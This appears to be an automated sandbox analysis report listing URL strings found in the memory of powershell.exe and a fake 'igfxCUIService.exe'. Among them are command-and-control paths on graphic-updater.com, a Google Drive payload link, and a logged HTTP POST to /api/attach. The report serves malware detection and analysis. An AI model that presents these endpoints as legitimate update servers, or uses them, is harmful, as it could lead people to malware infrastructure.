00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.818065175.000000000119C000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000003.793364315.0000000007F16000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.793470514.0000000007F17000.00000004.00000001.sdmp | String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.728563333.0000000000650000.00000004.00000040.sdmp | String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.729637199.0000000004701000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.819681378.0000000004D91000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Onlysame-origin;
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Persistent-AuthWWW-AuthenticateSec-Fetch-Dest
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocg5Eh
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-2o-docs.googleusercontent.com/
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp | String found in binary or memory: https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8
Source: igfxCUIService.exe, 00000020.00000002.956121777.0000000001438000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
Source: igfxCUIService.exe, 00000005.00000003.878407019.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000002.956196667.000000000146D000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
Source: igfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eumgr32.dll
Source: powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.820903134.0000000005611000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://google.com/
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://google.com/a
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp String found in binary or memory: https://graphic-updater.com/
Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/5
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/C
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/P
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/Q
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/X
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attach
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attach/
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp String found in binary or memory: https://graphic-updater.com/api/attachM&dQ%
Source: igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachent.com
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachn5
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attacht.com
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/attachtent.com
Source: igfxCUIService.exe, 00000020.00000003.932634820.00000000014A2000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.916793791.000000000150B000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req
Source: igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919317267.00000000014A2000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req2
Source: igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req7
Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/req8
Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqC
Source: igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqM
Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqO
Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqT
Source: igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqV
Source: igfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqW
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqX
Source: igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqb
Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqch
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqd
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqdll
Source: igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqdlli
Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqj
Source: igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqm
Source: igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqm64W%
Source: igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmj
Source: igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmv1
Source: igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqmx
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpString found in binary or memory: https://graphic-updater.com/api/reqo
Source: igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/reqs%qPG
Source: igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requ
Source: igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencoded
Source: igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencodedW%
Source: igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/api/requrlencodedz%hPF
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/comD
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/e6
Source: igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/ll
Source: igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/m6
Source: igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/om
Source: igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/om6
Source: igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/omX
Source: igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com/u
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comB
Source: igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.com_
Source: igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp String found in binary or memory: https://graphic-updater.comcom5
Source: igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comcomV
Source: igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpString found in binary or memory: https://graphic-updater.comomH
Source: igfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmpString found in binary or memory: https://grc-0k-2o-docs.googleusercontent.com/%%doc-0k-2o-docs.googleusercontent.com
Source: powershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknown HTTP traffic detected: POST /api/attach HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: WinHttpClient Content-Length: 136 Host: graphic-updater.com
Source: unknown DNS traffic detected: queries for: drive.google.com
